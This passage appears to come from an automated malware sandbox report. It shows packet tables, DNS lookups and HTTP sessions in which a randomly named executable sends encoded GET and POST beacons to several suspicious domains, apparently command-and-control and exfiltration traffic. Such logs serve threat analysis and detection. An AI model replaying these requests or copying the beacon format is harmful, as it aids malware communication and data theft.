                                                          Jan 11, 2025 04:07:01.842690945 CET805132613.248.169.48192.168.2.7
                                                          Jan 11, 2025 04:07:01.842910051 CET5132680192.168.2.713.248.169.48
                                                          Jan 11, 2025 04:07:01.857254028 CET5132680192.168.2.713.248.169.48
                                                          Jan 11, 2025 04:07:01.862119913 CET805132613.248.169.48192.168.2.7
                                                          Jan 11, 2025 04:07:02.302726984 CET805132613.248.169.48192.168.2.7
                                                          Jan 11, 2025 04:07:02.302759886 CET805132613.248.169.48192.168.2.7
                                                          Jan 11, 2025 04:07:02.302841902 CET5132680192.168.2.713.248.169.48
                                                          Jan 11, 2025 04:07:03.366266966 CET5132680192.168.2.713.248.169.48
                                                          Jan 11, 2025 04:07:04.385675907 CET5132780192.168.2.713.248.169.48
                                                          Jan 11, 2025 04:07:04.390836000 CET805132713.248.169.48192.168.2.7
                                                          Jan 11, 2025 04:07:04.391138077 CET5132780192.168.2.713.248.169.48
                                                          Jan 11, 2025 04:07:04.411258936 CET5132780192.168.2.713.248.169.48
                                                          Jan 11, 2025 04:07:04.416249990 CET805132713.248.169.48192.168.2.7
                                                          Jan 11, 2025 04:07:04.416378021 CET805132713.248.169.48192.168.2.7
                                                          Jan 11, 2025 04:07:05.913137913 CET5132780192.168.2.713.248.169.48
                                                          Jan 11, 2025 04:07:05.965553045 CET805132713.248.169.48192.168.2.7
                                                          Jan 11, 2025 04:07:06.931469917 CET5132880192.168.2.713.248.169.48
                                                          Jan 11, 2025 04:07:06.936904907 CET805132813.248.169.48192.168.2.7
                                                          Jan 11, 2025 04:07:06.937014103 CET5132880192.168.2.713.248.169.48
                                                          Jan 11, 2025 04:07:06.946891069 CET5132880192.168.2.713.248.169.48
                                                          Jan 11, 2025 04:07:06.951813936 CET805132813.248.169.48192.168.2.7
                                                          Jan 11, 2025 04:07:07.422849894 CET805132813.248.169.48192.168.2.7
                                                          Jan 11, 2025 04:07:07.422872066 CET805132813.248.169.48192.168.2.7
                                                          Jan 11, 2025 04:07:07.423090935 CET5132880192.168.2.713.248.169.48
                                                          Jan 11, 2025 04:07:07.425821066 CET5132880192.168.2.713.248.169.48
                                                          Jan 11, 2025 04:07:07.430644035 CET805132813.248.169.48192.168.2.7
                                                          Jan 11, 2025 04:07:12.553097010 CET5132980192.168.2.766.29.149.46
                                                          Jan 11, 2025 04:07:12.558041096 CET805132966.29.149.46192.168.2.7
                                                          Jan 11, 2025 04:07:12.558130980 CET5132980192.168.2.766.29.149.46
                                                          Jan 11, 2025 04:07:12.572743893 CET5132980192.168.2.766.29.149.46
                                                          Jan 11, 2025 04:07:12.577477932 CET805132966.29.149.46192.168.2.7
                                                          Jan 11, 2025 04:07:13.189049959 CET805132966.29.149.46192.168.2.7
                                                          Jan 11, 2025 04:07:13.189146042 CET805132966.29.149.46192.168.2.7
                                                          Jan 11, 2025 04:07:13.189212084 CET5132980192.168.2.766.29.149.46
                                                          Jan 11, 2025 04:07:13.753506899 CET805132713.248.169.48192.168.2.7
                                                          Jan 11, 2025 04:07:13.753642082 CET5132780192.168.2.713.248.169.48
                                                          Jan 11, 2025 04:07:14.084865093 CET5132980192.168.2.766.29.149.46
                                                          Jan 11, 2025 04:07:15.108572006 CET5133080192.168.2.766.29.149.46
                                                          Jan 11, 2025 04:07:15.113580942 CET805133066.29.149.46192.168.2.7
                                                          Jan 11, 2025 04:07:15.113670111 CET5133080192.168.2.766.29.149.46
                                                          Jan 11, 2025 04:07:15.128312111 CET5133080192.168.2.766.29.149.46
                                                          Jan 11, 2025 04:07:15.133203983 CET805133066.29.149.46192.168.2.7
                                                          Jan 11, 2025 04:07:15.753412962 CET805133066.29.149.46192.168.2.7
                                                          Jan 11, 2025 04:07:15.753624916 CET805133066.29.149.46192.168.2.7
                                                          Jan 11, 2025 04:07:15.753691912 CET5133080192.168.2.766.29.149.46
                                                          Jan 11, 2025 04:07:16.631876945 CET5133080192.168.2.766.29.149.46
                                                          Jan 11, 2025 04:07:17.650403976 CET5133180192.168.2.766.29.149.46
                                                          Jan 11, 2025 04:07:17.655323029 CET805133166.29.149.46192.168.2.7
                                                          Jan 11, 2025 04:07:17.655425072 CET5133180192.168.2.766.29.149.46
                                                          Jan 11, 2025 04:07:17.670074940 CET5133180192.168.2.766.29.149.46
                                                          Jan 11, 2025 04:07:17.674962997 CET805133166.29.149.46192.168.2.7
                                                          Jan 11, 2025 04:07:17.675076962 CET805133166.29.149.46192.168.2.7
                                                          Jan 11, 2025 04:07:18.269484043 CET805133166.29.149.46192.168.2.7
                                                          Jan 11, 2025 04:07:18.269505024 CET805133166.29.149.46192.168.2.7
                                                          Jan 11, 2025 04:07:18.269556046 CET5133180192.168.2.766.29.149.46
                                                          Jan 11, 2025 04:07:19.178584099 CET5133180192.168.2.766.29.149.46
                                                          Jan 11, 2025 04:07:20.202625036 CET5133280192.168.2.766.29.149.46
                                                          Jan 11, 2025 04:07:20.207590103 CET805133266.29.149.46192.168.2.7
                                                          Jan 11, 2025 04:07:20.210165024 CET5133280192.168.2.766.29.149.46
                                                          Jan 11, 2025 04:07:20.219361067 CET5133280192.168.2.766.29.149.46
                                                          Jan 11, 2025 04:07:20.224221945 CET805133266.29.149.46192.168.2.7
                                                          Jan 11, 2025 04:07:20.828409910 CET805133266.29.149.46192.168.2.7
                                                          Jan 11, 2025 04:07:20.828577042 CET805133266.29.149.46192.168.2.7
                                                          Jan 11, 2025 04:07:20.828708887 CET5133280192.168.2.766.29.149.46
                                                          Jan 11, 2025 04:07:20.831377029 CET5133280192.168.2.766.29.149.46
                                                          Jan 11, 2025 04:07:20.836215019 CET805133266.29.149.46192.168.2.7

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Jan 11, 2025 04:05:43.090971947 CET53619851.1.1.1192.168.2.7
                                                          Jan 11, 2025 04:06:30.206834078 CET5851253192.168.2.71.1.1.1
                                                          Jan 11, 2025 04:06:30.244719028 CET53585121.1.1.1192.168.2.7
                                                          Jan 11, 2025 04:06:46.070787907 CET5427753192.168.2.71.1.1.1
                                                          Jan 11, 2025 04:06:46.123529911 CET53542771.1.1.1192.168.2.7
                                                          Jan 11, 2025 04:06:59.276139021 CET4985653192.168.2.71.1.1.1
                                                          Jan 11, 2025 04:06:59.287982941 CET53498561.1.1.1192.168.2.7
                                                          Jan 11, 2025 04:07:12.431974888 CET6007253192.168.2.71.1.1.1
                                                          Jan 11, 2025 04:07:12.550628901 CET53600721.1.1.1192.168.2.7
                                                          Jan 11, 2025 04:07:26.526067019 CET5549153192.168.2.71.1.1.1
                                                          Jan 11, 2025 04:07:26.537486076 CET53554911.1.1.1192.168.2.7

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Jan 11, 2025 04:06:30.206834078 CET192.168.2.71.1.1.10xaad0Standard query (0)www.christinascuties.netA (IP address)IN (0x0001)false
                                                          Jan 11, 2025 04:06:46.070787907 CET192.168.2.71.1.1.10x9f8dStandard query (0)www.techmiseajour.netA (IP address)IN (0x0001)false
                                                          Jan 11, 2025 04:06:59.276139021 CET192.168.2.71.1.1.10xf866Standard query (0)www.aktmarket.xyzA (IP address)IN (0x0001)false
                                                          Jan 11, 2025 04:07:12.431974888 CET192.168.2.71.1.1.10x192aStandard query (0)www.golivenow.liveA (IP address)IN (0x0001)false
                                                          Jan 11, 2025 04:07:26.526067019 CET192.168.2.71.1.1.10x4e00Standard query (0)www.iglpg.onlineA (IP address)IN (0x0001)false

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Jan 11, 2025 04:06:30.244719028 CET1.1.1.1192.168.2.70xaad0No error (0)www.christinascuties.net74.208.236.156A (IP address)IN (0x0001)false
                                                          Jan 11, 2025 04:06:46.123529911 CET1.1.1.1192.168.2.70x9f8dNo error (0)www.techmiseajour.nettechmiseajour.netCNAME (Canonical name)IN (0x0001)false
                                                          Jan 11, 2025 04:06:46.123529911 CET1.1.1.1192.168.2.70x9f8dNo error (0)techmiseajour.net84.32.84.32A (IP address)IN (0x0001)false
                                                          Jan 11, 2025 04:06:59.287982941 CET1.1.1.1192.168.2.70xf866No error (0)www.aktmarket.xyz13.248.169.48A (IP address)IN (0x0001)false
                                                          Jan 11, 2025 04:06:59.287982941 CET1.1.1.1192.168.2.70xf866No error (0)www.aktmarket.xyz76.223.54.146A (IP address)IN (0x0001)false
                                                          Jan 11, 2025 04:07:12.550628901 CET1.1.1.1192.168.2.70x192aNo error (0)www.golivenow.live66.29.149.46A (IP address)IN (0x0001)false
                                                          Jan 11, 2025 04:07:26.537486076 CET1.1.1.1192.168.2.70x4e00No error (0)www.iglpg.onlineiglpg.onlineCNAME (Canonical name)IN (0x0001)false
                                                          Jan 11, 2025 04:07:26.537486076 CET1.1.1.1192.168.2.70x4e00No error (0)iglpg.online3.33.130.190A (IP address)IN (0x0001)false
                                                          Jan 11, 2025 04:07:26.537486076 CET1.1.1.1192.168.2.70x4e00No error (0)iglpg.online15.197.148.33A (IP address)IN (0x0001)false

                                                          HTTP Request Dependency Graph

                                                          • www.christinascuties.net
                                                          • www.techmiseajour.net
                                                          • www.aktmarket.xyz
                                                          • www.golivenow.live

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.75132074.208.236.156806208C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 04:06:30.266010046 CET439OUTGET /raea/?-pztsZ6x=PqKj/8KuIq0WSNkJd9VnweLoPwEm47E1M43YI/iJd5qBB0feLv8ZTXGbO6iF0HlQbmuDykhZpdeI6maFWjpp3E/jI7y5iYAByXvyTWq6cDZMSDvdA4QMsGyTH+1ZevuClMSDErjQvhDp&jHc=_xZhxrExRJpXy4 HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US,en;q=0.9
                                                          Host: www.christinascuties.net
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                          Jan 11, 2025 04:06:30.780997038 CET770INHTTP/1.1 404 Not Found
                                                          Content-Type: text/html
                                                          Content-Length: 626
                                                          Connection: close
                                                          Date: Sat, 11 Jan 2025 03:06:30 GMT
                                                          Server: Apache
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.75132184.32.84.32806208C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 04:06:46.156256914 CET704OUTPOST /jytl/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Host: www.techmiseajour.net
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 221
                                                          Origin: http://www.techmiseajour.net
                                                          Referer: http://www.techmiseajour.net/jytl/
                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                          Data Raw: 2d 70 7a 74 73 5a 36 78 3d 74 34 4a 73 36 2b 37 61 30 47 4c 38 53 59 74 6b 76 79 37 6d 44 68 2b 33 2b 58 30 4f 6f 34 39 55 43 52 78 68 30 66 2b 32 4f 51 49 48 75 74 4a 79 61 75 55 35 55 51 44 61 65 4c 6d 4b 63 6d 43 34 33 49 4c 31 47 71 72 51 55 4d 4f 4e 72 6f 77 55 75 4f 4f 6f 4b 4e 55 65 6e 52 37 6d 50 6d 6f 67 47 31 34 35 45 55 74 6e 49 4b 5a 79 38 50 33 32 79 6a 6e 68 69 4f 51 75 4a 38 7a 79 62 6d 47 76 69 4e 2b 58 62 57 6a 79 46 45 58 44 37 70 4d 68 78 7a 64 30 6a 4b 79 62 5a 6a 30 65 41 61 44 55 69 57 4f 5a 31 5a 57 6b 48 74 46 38 32 72 4d 73 53 32 32 62 54 62 78 51 68 73 68 69 4b 43 45 58 54 69 73 72 4a 41 66 4c 72 38 71 6f 6d 62 49 54 6e 67 3d 3d
                                                          Data Ascii: -pztsZ6x=t4Js6+7a0GL8SYtkvy7mDh+3+X0Oo49UCRxh0f+2OQIHutJyauU5UQDaeLmKcmC43IL1GqrQUMONrowUuOOoKNUenR7mPmogG145EUtnIKZy8P32yjnhiOQuJ8zybmGviN+XbWjyFEXD7pMhxzd0jKybZj0eAaDUiWOZ1ZWkHtF82rMsS22bTbxQhshiKCEXTisrJAfLr8qombITng==


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          2192.168.2.75132284.32.84.32806208C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 04:06:48.700236082 CET724OUTPOST /jytl/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Host: www.techmiseajour.net
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 241
                                                          Origin: http://www.techmiseajour.net
                                                          Referer: http://www.techmiseajour.net/jytl/
                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                          Data Raw: 2d 70 7a 74 73 5a 36 78 3d 74 34 4a 73 36 2b 37 61 30 47 4c 38 54 34 39 6b 74 52 44 6d 50 52 2b 77 69 48 30 4f 79 49 39 51 43 52 74 68 30 61 65 6d 4f 47 34 48 75 49 31 79 62 76 55 35 5a 77 44 61 57 72 6d 31 42 57 43 7a 33 49 48 4c 47 72 6e 51 55 4d 61 4e 72 70 41 55 75 2f 4f 6e 4c 64 55 63 71 78 37 6b 53 57 6f 67 47 31 34 35 45 58 52 42 49 4b 42 79 38 2f 48 32 7a 47 4c 69 71 75 51 74 4f 38 7a 79 66 6d 47 72 69 4e 2f 34 62 55 58 55 46 48 76 44 37 73 77 68 2f 48 70 33 74 4b 79 64 47 7a 31 43 4a 66 32 62 36 57 75 6a 34 71 4c 2f 50 64 74 6c 33 64 4e 4f 49 55 36 33 4e 4b 4a 72 6c 75 46 55 64 6b 5a 69 52 6a 6f 7a 45 69 72 71 30 4c 50 43 72 4a 70 58 78 52 6a 6c 56 2b 38 55 65 32 61 4e 38 6c 5a 54 2f 55 63 78 49 63 49 3d
                                                          Data Ascii: -pztsZ6x=t4Js6+7a0GL8T49ktRDmPR+wiH0OyI9QCRth0aemOG4HuI1ybvU5ZwDaWrm1BWCz3IHLGrnQUMaNrpAUu/OnLdUcqx7kSWogG145EXRBIKBy8/H2zGLiquQtO8zyfmGriN/4bUXUFHvD7swh/Hp3tKydGz1CJf2b6Wuj4qL/Pdtl3dNOIU63NKJrluFUdkZiRjozEirq0LPCrJpXxRjlV+8Ue2aN8lZT/UcxIcI=


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          3192.168.2.75132384.32.84.32806208C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 04:06:51.249531031 CET1737OUTPOST /jytl/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Host: www.techmiseajour.net
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 1253
                                                          Origin: http://www.techmiseajour.net
                                                          Referer: http://www.techmiseajour.net/jytl/
                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                          Data Raw: 2d 70 7a 74 73 5a 36 78 3d 74 34 4a 73 36 2b 37 61 30 47 4c 38 54 34 39 6b 74 52 44 6d 50 52 2b 77 69 48 30 4f 79 49 39 51 43 52 74 68 30 61 65 6d 4f 47 77 48 75 36 4e 79 61 49 41 35 59 77 44 61 63 4c 6d 4f 42 57 43 55 33 4c 33 78 47 72 36 72 55 50 69 4e 71 4f 6f 55 6f 4c 36 6e 42 64 55 63 6a 52 37 6c 50 6d 70 30 47 32 42 79 45 55 35 42 49 4b 42 79 38 39 76 32 69 54 6e 69 73 75 51 75 4a 38 7a 75 62 6d 47 54 69 4e 6e 43 62 58 37 69 46 33 50 44 37 4d 41 68 39 30 42 33 6c 4b 79 66 46 7a 31 4b 4a 66 7a 62 36 56 61 46 34 70 57 71 50 65 4e 6c 32 4b 6b 36 4e 45 75 77 61 37 70 56 6e 39 74 6b 54 6c 64 79 63 78 77 4e 43 77 6a 4c 70 71 33 32 6a 59 68 65 2f 57 7a 6b 4a 74 45 44 53 32 7a 63 34 6a 51 48 73 33 38 4c 56 62 35 6a 6f 42 75 70 73 6a 50 79 58 33 2b 78 6c 32 34 65 2b 76 4e 62 69 45 70 62 45 53 77 44 71 4e 72 31 59 79 42 56 31 43 31 71 38 77 69 2b 57 59 7a 50 59 6e 46 4d 52 36 6b 73 71 37 36 48 34 75 39 34 2b 61 2b 30 63 68 67 67 6b 66 63 4b 38 59 73 34 54 4e 7a 66 50 57 73 35 42 41 51 72 59 69 39 4b 5a [TRUNCATED]
                                                          Data Ascii: -pztsZ6x=t4Js6+7a0GL8T49ktRDmPR+wiH0OyI9QCRth0aemOGwHu6NyaIA5YwDacLmOBWCU3L3xGr6rUPiNqOoUoL6nBdUcjR7lPmp0G2ByEU5BIKBy89v2iTnisuQuJ8zubmGTiNnCbX7iF3PD7MAh90B3lKyfFz1KJfzb6VaF4pWqPeNl2Kk6NEuwa7pVn9tkTldycxwNCwjLpq32jYhe/WzkJtEDS2zc4jQHs38LVb5joBupsjPyX3+xl24e+vNbiEpbESwDqNr1YyBV1C1q8wi+WYzPYnFMR6ksq76H4u94+a+0chggkfcK8Ys4TNzfPWs5BAQrYi9KZrpxQ47mY3YLKnfCjYv7fSat8iak0Pr8AxbUImIcM977stc20RdlKeCvQgibYy+cm2kgNBFyaDq7wh7jzOnGJipETaRunVkfDejCSb42wIcwydj6cH6p+W1TOexkOZv22OVf7HRfosuoMcvVSLcWQG8ocEwhgJy7mbzFJRQHUGoWMjURoFRvES0FIld5o6p+ARsvLGgyA0kx6va0XM+pw/CEWP32Ou2PR0vKK/7q6fbSKd3qreAMXocCdetTldr4dDv0KsRjpY3KYHOiyZfhTgsQjHU9G9bPa+SBL9KTsn2mdXq0xLkuOH2pPn53x9CPGRszF/g5lLz4F7+JycMSjVDDsTTHgBP4u1A4VFZeLcquwi47rjbSvjKq2wf0fcbTpzExg0UfAMGHhHozHyJkz60nYQaw6WGcaOWxnpdpXBzNJHxP22ef2Jbg+amwnr8RfQE0M2Co1cjvB8knimA4tIqQqDRQVX5fOaOTrzrr3esNoi33BFngwz5Wt7Z32WWIMfob5CH743zJlYDuPhTgiy397H2eQjjGiJdRG+Fe+Sf8fZ6ae/Lax1zJ/9AosSbW+H9ILz0i5lMH8VYFhhUEdWvCSmI6g1UoFxoJMJRkc0utGpqT/FzHvMErPeW0YZPnwYGTEQPQmKC/rfCMTJgueWXAH3oGNOHdbkM [TRUNCATED]


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          4192.168.2.75132484.32.84.32806208C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 04:06:53.790595055 CET436OUTGET /jytl/?-pztsZ6x=g6hM5OfAy0aZTOdzxy+YHDeawhxh9ZVnbH1D7PSRWxwlxqBVZ/VTfAfjReyEGXu+lurHf7fRU8SuqLFFtve4HtQbsAC9MkV/G3NnAml8OZJy5NH6433LttETR9jiekKwjvXYHWThJEDI&jHc=_xZhxrExRJpXy4 HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US,en;q=0.9
                                                          Host: www.techmiseajour.net
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                          Jan 11, 2025 04:06:54.258259058 CET1236INHTTP/1.1 200 OK
                                                          Date: Sat, 11 Jan 2025 03:06:54 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 9973
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Server: hcdn
                                                          alt-svc: h3=":443"; ma=86400
                                                          x-hcdn-request-id: e7cef389a12f820e905991c66549f7fa-bos-edge1
                                                          Expires: Sat, 11 Jan 2025 03:06:53 GMT
                                                          Cache-Control: no-cache
                                                          Accept-Ranges: bytes
                                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                          Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"O
                                                          Jan 11, 2025 04:06:54.258280993 CET1236INData Raw: 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63
                                                          Data Ascii: pen Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!
                                                          Jan 11, 2025 04:06:54.258294106 CET1236INData Raw: 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63
                                                          Data Ascii: ;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-co
                                                          Jan 11, 2025 04:06:54.258346081 CET672INData Raw: 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72
                                                          Data Ascii: :#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-a
                                                          Jan 11, 2025 04:06:54.258827925 CET1236INData Raw: 79 6e 63 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 7d 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 3d 77 69
                                                          Data Ascii: ync></script><script>function gtag(){dataLayer.push(arguments)}window.dataLayer=window.dataLayer||[],gtag("js",new Date),gtag("config","UA-26575989-44")</script><nav class="navbar navbar-inverse"><div class=container-fluid style="padding:0 32p
                                                          Jan 11, 2025 04:06:54.258872032 CET1236INData Raw: 2d 61 63 63 6f 75 6e 74 2d 70 61 67 65 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6e 74 61 69 6e 65 72 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 20 74 6f 70 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73
                                                          Data Ascii: -account-page><div class=container><div class="col-xs-12 top-container"><div class=message><h2 id=pathName><i></i></h2><div class=message-subtitle>Happy to see your domain with Hostinger!</div><p>Your domain is active and is using Hostinger na
